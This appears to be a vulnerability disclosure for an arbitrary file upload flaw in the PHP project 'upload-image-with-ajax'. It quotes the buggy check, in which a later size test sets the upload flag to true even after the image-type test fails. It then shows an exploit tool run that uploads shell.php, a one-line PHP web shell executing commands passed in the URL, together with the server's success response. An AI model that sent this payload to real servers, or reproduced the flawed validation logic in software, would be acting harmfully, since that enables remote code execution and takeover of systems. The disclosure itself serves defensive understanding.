Title:Arbitrary file upload vulnerability in upload-image-with-ajax
The code below changes the $ready flag to true if the file conforms to the size of < 1000000. Reversing the check that the file is an image. So, a .php file can be uploaded with only a warning allowing code execution.

$ready = false;
if((($imageType == "image/jpeg") || ($imageType == "image/jpg") || ($imageType == "image/png"))&&in_array($fileExt, $validext)){
$ready = true;
}else{
echo "was not an image
";
/You should abort the upload right here/
}
if($_FILES["fileUpload"]["size"] < 1000000){
$ready = true;
echo "file size is ".$_FILES['fileUpload']["size"]."
";
}else{
echo "file was TOO BIG!";
} $ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php  fileUpload


POST request size is 482 bytes

Sending Payload:
POST /upload-image-with-ajax/upload.php HTTP/1.1
Host: 192.168.0.3
User-Agent: File Upload Exploiter/v1.2
Accept: */*
Content-Length: 251
Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853

--------------------------c8e05c8871143853
Content-Disposition: form-data; name="fileUpload"; filename="shell.php"
Content-Type: application/octet-stream

<?php $cmd=$_GET['cmd']; system($cmd);?>

--------------------------c8e05c8871143853--

HTTP/1.1 200 OK
Date: Tue, 24 Dec 2019 12:16:57 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Length: 96
Content-Type: text/html; charset=UTF-8

was not an image<br><h2> application/octet-stream</h2>file size is 42<br>upload successful!
[+] Total bytes read: 267